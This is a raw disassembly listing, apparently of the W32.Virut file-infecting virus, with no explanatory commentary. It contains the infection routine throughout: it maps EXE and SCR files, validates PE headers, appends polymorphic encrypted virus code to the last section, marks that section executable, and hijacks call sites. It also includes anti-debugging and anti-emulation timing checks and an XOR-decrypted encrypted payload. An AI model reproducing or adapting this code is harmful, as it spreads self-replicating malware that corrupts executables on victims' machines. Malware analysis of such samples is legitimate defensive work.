test dword ptr [ebp+403431h], 8000000h
jz short loc_31429D18
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_31429D13
mov ax, 424h
stosw
jmp short loc_31429D26
; ---------------------------------------------------------------------------
loc_31429D13: ; CODE XREF: UPX2:31429D09�j
mov al, 8
stosb
jmp short loc_31429D26
; ---------------------------------------------------------------------------
loc_31429D18: ; CODE XREF: UPX2:31429CF0�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_31429D29
; ---------------------------------------------------------------------------
loc_31429D26: ; CODE XREF: UPX2:31429CE4�j
; UPX2:31429D11�j ...
mov al, 0C9h
stosb
loc_31429D29: ; CODE XREF: UPX2:31429C9C�j
; UPX2:31429D24�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31429D55
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_31429D55: ; CODE XREF: UPX2:31429D33�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_31429DC0
test dword ptr [ebp+403431h], 20000000h
jz short loc_31429D86
loc_31429D79: ; CODE XREF: UPX2:31429D84�j
test edi, 3
jz short loc_31429D86
mov al, 90h
stosb
jmp short loc_31429D79
; ---------------------------------------------------------------------------
loc_31429D86: ; CODE XREF: UPX2:31429D77�j
; UPX2:31429D7F�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_31429DB4
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_31429DBE
; ---------------------------------------------------------------------------
loc_31429DB4: ; CODE XREF: UPX2:31429DA6�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_31429DBE: ; CODE XREF: UPX2:31429DB2�j
stosw
loc_31429DC0: ; CODE XREF: UPX2:31429D6B�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_31429E3F
test dword ptr [ebp+403431h], 20000000h
jz short loc_31429DE5
loc_31429DD8: ; CODE XREF: UPX2:31429DE3�j
test edi, 3
jz short loc_31429DE5
mov al, 90h
stosb
jmp short loc_31429DD8
; ---------------------------------------------------------------------------
loc_31429DE5: ; CODE XREF: UPX2:31429DD6�j
; UPX2:31429DDE�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_31429E0E
lea eax, [ebp+403429h]
loc_31429E06: ; CODE XREF: UPX2:31429E0C�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31429E06
loc_31429E0E: ; CODE XREF: UPX2:31429DFE�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31429E23
mov ax, 0C031h
stosw
loc_31429E23: ; CODE XREF: UPX2:31429E1B�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31429E3C
mov ax, 0C031h
stosw
loc_31429E3C: ; CODE XREF: UPX2:31429E34�j
mov al, 0C3h
stosb
loc_31429E3F: ; CODE XREF: UPX2:31429DCA�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_31429E57
push edi
sub edi, eax
pop eax
jmp short loc_31429E70
; ---------------------------------------------------------------------------
loc_31429E57: ; CODE XREF: UPX2:31429E4F�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31429E70: ; CODE XREF: UPX2:31429E55�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_31429E90
neg eax
loc_31429E90: ; CODE XREF: UPX2:31429E8C�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31429E94 proc near ; CODE XREF: sub_3142A2C0+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_3142A07C
call near ptr loc_31429EB4+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31429EB4: ; CODE XREF: sub_31429E94+F�p
add bh, bh
sub_31429E94 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_314295CE
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_314295CE
mov edi, [ebp+4039A6h]
push esi
call sub_314295CE
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3142A07C
jz loc_3142A07C
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_3142A04D
loc_31429F2E: ; CODE XREF: sub_3142A04D+29�j
lodsb
cmp al, 0E8h
jnz loc_31429FD9
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_314295CE
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_31429F5C
cmp eax, [edi+0Ch]
jnb loc_3142A075
jmp short loc_31429F68
; ---------------------------------------------------------------------------
loc_31429F5C: ; CODE XREF: sub_3142A04D-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3142A075
loc_31429F68: ; CODE XREF: sub_3142A04D-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3142A075
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_314295CE
cmp [ebp+4039A6h], edi
jnz loc_3142A075
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3142A075
cmp eax, [edi+8]
jnb loc_3142A075
loc_31429FB1: ; CODE XREF: sub_3142A04D+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_3142A08B
jmp loc_3142A075
; ---------------------------------------------------------------------------
loc_31429FD9: ; CODE XREF: sub_3142A04D-11C�j
cmp al, 0FFh
jnz loc_3142A075
cmp byte ptr [esi], 15h
jnz loc_3142A075
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_314295CE
cmp [ebp+4039A6h], edi
jnz short loc_3142A075
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_3142A022
cmp eax, [ebp+4039C6h]
jb short loc_3142A08B
loc_3142A022: ; CODE XREF: sub_3142A04D-35�j
cmp eax, 70000000h
jb short loc_3142A060
call sub_3142A04D
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_3142A04C
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3142A067
; ---------------------------------------------------------------------------
locret_3142A04C: ; CODE XREF: sub_3142A04D-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3142A04D
; =============== S U B R O U T I N E =======================================
sub_3142A04D proc near ; CODE XREF: sub_3142A04D-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 31429F2E SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_314296D5
popa
loc_3142A060: ; CODE XREF: sub_3142A04D-26�j
test eax, 80000000h
jnz short loc_3142A075
loc_3142A067: ; CODE XREF: sub_3142A04D-3�j
sub eax, [edi+0Ch]
jb short loc_3142A075
cmp eax, [edi+8]
jb loc_31429FB1
loc_3142A075: ; CODE XREF: sub_3142A04D-F9�j
; sub_3142A04D-EB�j ...
dec ecx
jnz loc_31429F2E
loc_3142A07C: ; CODE XREF: sub_31429E94+9�j
; UPX2:31429F16�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3142A0C7
; ---------------------------------------------------------------------------
loc_3142A08B: ; CODE XREF: sub_3142A04D-7F�j
; sub_3142A04D-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3142A0C7: ; CODE XREF: sub_3142A04D+3C�j
pop edi
pop esi
retn
sub_3142A04D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142A0CA proc near ; CODE XREF: UPX2:3142A298�p
; sub_3142A2C0+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3142A19B
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3142A19B
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3142A653
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3142A647
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3142A647
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3142A647
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3142A61F
mov [ebp+403972h], eax
locret_3142A19B: ; CODE XREF: sub_3142A0CA+10�j
; sub_3142A0CA+27�j ...
retn
sub_3142A0CA endp
; =============== S U B R O U T I N E =======================================
sub_3142A19C proc near ; CODE XREF: sub_3142A2C0+117�p
; sub_3142A2C0+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3142A1B6
add eax, [ebp+40106Dh]
loc_3142A1B6: ; CODE XREF: sub_3142A19C+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3142A19C endp
; =============== S U B R O U T I N E =======================================
sub_3142A1E1 proc near ; CODE XREF: sub_3142A2C0:loc_3142A30F�p
; sub_3142A2C0+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3142A1E6: ; CODE XREF: sub_3142A1E1+23�j
jecxz short locret_3142A21D
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3142A21D
cmp dword ptr [edx+0Ch], 1
jb short loc_3142A1E6
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3142A21D: ; CODE XREF: sub_3142A1E1:loc_3142A1E6�j
; sub_3142A1E1+1D�j ...
retn
sub_3142A1E1 endp
; =============== S U B R O U T I N E =======================================
sub_3142A21E proc near ; CODE XREF: UPX2:3142A2AA�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3142A21E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3142A22B: ; CODE XREF: UPX2:3142A24C�j
mov ecx, edi
jmp short loc_3142A23A
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3142A236: ; CODE XREF: UPX2:3142A248�j
mov ebx, edi
xor ecx, ecx
loc_3142A23A: ; CODE XREF: UPX2:3142A22D�j
; UPX2:3142A250�j
lodsb
cmp al, 61h
jb short loc_3142A245
cmp al, 7Ah
ja short loc_3142A245
sub al, 20h
loc_3142A245: ; CODE XREF: UPX2:3142A23D�j
; UPX2:3142A241�j
stosb
cmp al, 5Ch
jz short loc_3142A236
cmp al, 2Eh
jz short loc_3142A22B
cmp al, 0
jnz short loc_3142A23A
jecxz short locret_3142A21D
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3142A268
cmp eax, 524353h
jnz locret_3142A19B
loc_3142A268: ; CODE XREF: UPX2:3142A25B�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3142A19B
cmp eax, 4E554357h
jz locret_3142A19B
cmp eax, 32334357h
jz locret_3142A19B
cmp eax, 4F545350h
jz locret_3142A19B
xor ebx, ebx
call sub_3142A0CA
jz locret_3142A19B
xor edx, edx
call sub_3142A2C0
call sub_3142A21E
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3142A5FD
; =============== S U B R O U T I N E =======================================
sub_3142A2C0 proc near ; CODE XREF: UPX2:3142A2A5�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3142A5FD
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3142A5FD
test dword ptr [ebx+16h], 2000h
jnz loc_3142A5FD
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3142A5FD
jecxz short loc_3142A30F
cmp ecx, 101h
jbe loc_3142A5FD
loc_3142A30F: ; CODE XREF: sub_3142A2C0+41�j
call sub_3142A1E1
jb loc_3142A5FD
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_31428E19
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3142A339: ; CODE XREF: sub_3142A2C0+92�j
push 20h
dec cl
pop eax
js short loc_3142A354
call sub_31428E19
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3142A339
; ---------------------------------------------------------------------------
loc_3142A354: ; CODE XREF: sub_3142A2C0+7E�j
; sub_3142A2C0+CD�j ...
push 6
pop ecx
loc_3142A35A: ; CODE XREF: sub_3142A2C0+B8�j
push 6
pop eax
call sub_31428E19
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3142A35A
test dword ptr [ebp+403431h], 8
jnz short loc_3142A38F
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3142A354
loc_3142A38F: ; CODE XREF: sub_3142A2C0+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3142A3B6
cmp byte ptr [ebp+403429h], 5
jz short loc_3142A354
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3142A354
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3142A354
loc_3142A3B6: ; CODE XREF: sub_3142A2C0+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142A3CB
cmp byte ptr [ebp+403429h], 2
ja short loc_3142A354
loc_3142A3CB: ; CODE XREF: sub_3142A2C0+100�j
and dword ptr [ebp+4039AEh], 0
call loc_31429866
call sub_3142A19C
call sub_3142A606
mov ebx, [ebp+403976h]
call sub_3142A0CA
jz loc_3142A5FD
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3142A1E1
jb loc_3142A5FD
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3142A433
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3142A433: ; CODE XREF: sub_3142A2C0+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3142A447
rep movsb
loc_3142A447: ; CODE XREF: sub_3142A2C0+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3142A4FF
push dword ptr [ebx+28h]
call sub_314295CE
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3142A4FF
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3142A484
xor ecx, ecx
loc_3142A484: ; CODE XREF: sub_3142A2C0+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3142A4EB
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3142A4C4
neg dword ptr [eax]
loc_3142A4C4: ; CODE XREF: sub_3142A2C0+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3142A4E2
neg dword ptr [eax]
loc_3142A4E2: ; CODE XREF: sub_3142A2C0+21E�j
push ecx
call sub_3142A19C
pop ecx
jmp short loc_3142A4F7
; ---------------------------------------------------------------------------
loc_3142A4EB: ; CODE XREF: sub_3142A2C0+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3142A4F7: ; CODE XREF: sub_3142A2C0+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3142A4FF: ; CODE XREF: sub_3142A2C0+191�j
; sub_3142A2C0+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3142A518
imul edx, 12345678h
loc_3142A518: ; CODE XREF: sub_3142A2C0+250�j
mov [eax-1], dl
call sub_314284EC
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3142A549
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3142A549: ; CODE XREF: sub_3142A2C0+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142A56E
push edx
call sub_31429E94
pop edx
loc_3142A56E: ; CODE XREF: sub_3142A2C0+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3142A579
mov [ebx+28h], ecx
loc_3142A579: ; CODE XREF: sub_3142A2C0+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3142A58A
mov [edx+8], ecx
loc_3142A58A: ; CODE XREF: sub_3142A2C0+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3142A5BB
add ecx, [ebp+40106Dh]
loc_3142A5BB: ; CODE XREF: sub_3142A2C0+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3142A5DD
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3142A5DD
mov dh, [ebp+403430h]
loc_3142A5DD: ; CODE XREF: sub_3142A2C0+307�j
; sub_3142A2C0+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3142A5F4
loc_3142A5E9: ; CODE XREF: sub_3142A2C0+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3142A5E9
jmp short loc_3142A5FD
; ---------------------------------------------------------------------------
loc_3142A5F4: ; CODE XREF: sub_3142A2C0+327�j
; sub_3142A2C0+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3142A5F4
loc_3142A5FD: ; CODE XREF: UPX2:3142A2BB�j
; sub_3142A2C0+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3142A2C0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142A606 proc near ; CODE XREF: sub_3142A2C0+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3142A19B
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3142A61F: ; CODE XREF: sub_3142A0CA+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3142A647: ; CODE XREF: sub_3142A0CA+6B�j
; sub_3142A0CA+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3142A653: ; CODE XREF: sub_3142A0CA+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3142A606 endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 403349h, 0C10FF058h, 40158085h
dd 0C3C08500h, 0F0FFC883h, 8085C10Fh, 0C3004015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFB7EE8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 40384EB5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 4035F895h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFB2Bh, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 10h, 0B80020C2h, 30h, 3E8h, 24C200h
dd 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h, 1A8B5D30h
dd 3413ED81h, 39E80040h, 61FFFFE5h, 60004C2h, 5020301h
dd 0C99DC507h, 0FF654FDDh, 119415h, 9001h, 3Fh dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 2 dup(0)
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 153C7C80h
dd 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h, 5DCA7C86h
dd 11DA7C83h, 2ADE7C81h, 1D777C81h, 0B9057C80h, 0BB767C80h
dd 9E17C80h, 3DE57C83h, 3F587C86h, 27827C86h, 1CB87C81h
dd 24427C83h, 0B1C7C80h, 0B9747C81h, 9A517C80h, 0D877C80h
dd 0D4607C81h, 0D6827C90h, 0D7547C90h, 0D7697C90h, 0D7937C90h
dd 0DC557C90h, 0DCFD7C90h, 0DD907C90h, 0DEB67C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 14h dup(0)
a68:
unicode 0, <68>
dw 0A980h
aB1 db 'B1\',0
aB db 'B',0
aAsenamedobject:
unicode 0, <aseNamedObjects\W32_Virtu>,0
dd 0BCh dup(0)
dd 99h, 0Ch dup(0)
dd 0C5h, 18C8h dup(0)
; ---------------------------------------------------------------------------
cld
call near ptr sub_3143102E
; =============== S U B R O U T I N E =======================================
sub_31431006 proc near ; CODE XREF: sub_3143102E+4F�p
push ebx
loc_31431007: ; CODE XREF: UPX2:3143101D�j
mov ecx, 0DA5h
mov ebx, edx
loc_3143100E: ; CODE XREF: sub_31431006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_3143100E
pop ebx
retn
sub_31431006 endp
; ---------------------------------------------------------------------------
jb short loc_31431007
; START OF FUNCTION CHUNK FOR sub_3143102E
loc_3143101F: ; CODE XREF: sub_3143102E+3A�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3143102E
; =============== S U B R O U T I N E =======================================
sub_31431021 proc far ; CODE XREF: sub_3143102E+8�j
; sub_3143102E+19�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_31431055
sub_31431021 endp
; =============== S U B R O U T I N E =======================================
sub_3143102B proc near ; CODE XREF: sub_3143102E+1C�p
; sub_3143102E+22�p
rdtsc
retn
sub_3143102B endp
; =============== S U B R O U T I N E =======================================
sub_3143102E proc far ; CODE XREF: UPX2:31431001�p
var_6 = byte ptr -6
; FUNCTION CHUNK AT 3143101F SIZE 00000002 BYTES
test eax, eax
jnz short loc_3143103A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short near ptr sub_31431021
jmp short loc_31431049
; ---------------------------------------------------------------------------
loc_3143103A: ; CODE XREF: sub_3143102E+2�j
push eax
sidt fword ptr [esp+var_6+4]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short near ptr sub_31431021
loc_31431049: ; CODE XREF: sub_3143102E+A�j
push ebp
call sub_3143102B
xchg eax, ecx
call sub_3143102B
loc_31431055: ; CODE XREF: sub_31431021+8�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 8D7Dh
sub eax, 100h
jnb short loc_3143101F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_31431006
cdq
call near ptr 7C2C1859h
xor eax, 0F06D2756h
out dx, eax
in al, 76h
push edx
xchg esp, es:0ACDC44CBh
push cs
and [edx-500E7613h], dl
pop esp
pop ecx
sbb byte ptr [esi-3Dh], 0A0h
cmp edi, [ebx+7091CD9Eh]
sbb eax, 3956B2C1h
xchg eax, ecx
mov edi, 0FB9027CCh
dec ebx
sbb edx, [ebp-40C7937Ah]
adc al, 56h
push 0A6E65859h
or eax, 7F9BFF26h
setalc
mov ch, 5Fh
in al, dx
mov ah, 0DAh
xchg eax, ecx
cmpsd
push ss
retf 91FBh
sub_3143102E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0E6h, 0EBh, 0D5h
dd 0AD39CA2Ch, 73F1651Fh, 159D1D35h, 0D33AA496h, 0E5A0315Ch
dd 0F92B74DBh, 0FB7C3067h, 25BFA83Dh, 0F24F9A97h, 0BE129597h
dd 5BA43908h, 0C31BE8D3h, 6FFFD2FDh, 44E1748Dh, 9F2BB55Eh
dd 96EA5711h, 32A90A18h, 0CB57ADABh, 0DE697720h, 493DFBF3h
dd 9FA2D8E4h, 92A5332Bh, 997B8249h, 9CA6181Dh, 0D61D7C1h
dd 418B9CA8h, 0DF8873FCh, 9340514Eh, 912DBED0h, 97DD8503h
dd 45D35148h, 0B5AD1E34h, 0AD881622h, 469EF4AAh, 263CCBF6h
dd 39B3FF94h, 0D0470D7Bh, 8D4CEAC0h, 0F11AB8F9h, 0C201BFA1h
dd 0CA5D01C1h, 0A8E94440h, 0B305AF27h, 0C41FF9F5h, 0AD3A533Ah
dd 932F81B7h, 0FF3ABF0Ah, 52E4EEA1h, 27A6BD89h, 0FCBA0D26h
dd 0F3667485h, 0B10FD8FAh, 260FD723h, 0A4F4B251h, 4441C33Fh
dd 1AA937E6h, 1F17D607h, 0B89EE8A7h, 22B85642h, 0AEF32515h
dd 0B404FAC7h, 50C75532h, 0E4B450ACh, 6A7C3A2Bh, 0E536AA1h
dd 3331BFB8h, 0EE8CAF9Bh, 0B76C7540h, 0B349DA73h, 0D71AB25h
dd 0EAF6B46Fh, 0F241234Ch, 0E30ECA34h, 57E9106Ch, 0DA351162h
dd 0A1E38877h, 0B70E0D0Bh, 69C50FF9h, 2C9EDEA8h, 0C03FF650h
dd 0F07E0F61h, 0AA4C9863h, 2533F196h, 0C00B3CDCh, 5810F27Dh
dd 0DFD5D0CCh, 679C4127h, 0E9F78181h, 0C551DFB3h, 0FF39C536h
dd 0FC06A4BBh, 0FE4E12Bh, 44BB4944h, 897DF3A0h, 8E6FF9FBh
dd 32229956h, 0C925D8E7h, 0F27F0C63h, 0AC4F9765h, 0C034F294h
dd 28E1D10h, 7708E28Bh, 0B2ABD1FEh, 0F89E2C29h, 6BF88429h
dd 250BE0B7h, 0DFA75132h, 4B2BFC07h, 159004EDh, 1CB9F7CBh
dd 8416A492h, 0E6727379h, 40CDB158h, 0CF6BB3B2h, 0F5CC4249h
dd 63C6FC98h, 1FB8C3F1h, 4A009A2h, 0E367B145h, 0B974FEA9h
dd 0FB0C209Ah, 6DF98541h, 0E4FA5C5Ch, 2DAE3C0Ah, 7D0ACF10h
dd 0A5E77BEFh, 0CDBD7B66h, 898A4D4h, 0E841D4C6h, 69F5E7DBh
dd 62D9B484h, 708E0F0Fh, 51DC6853h, 80A74148h, 766E1F2Eh
dd 0E66EF679h, 3A45E3F9h, 258BA890h, 6F057787h, 0D1D3EDE1h
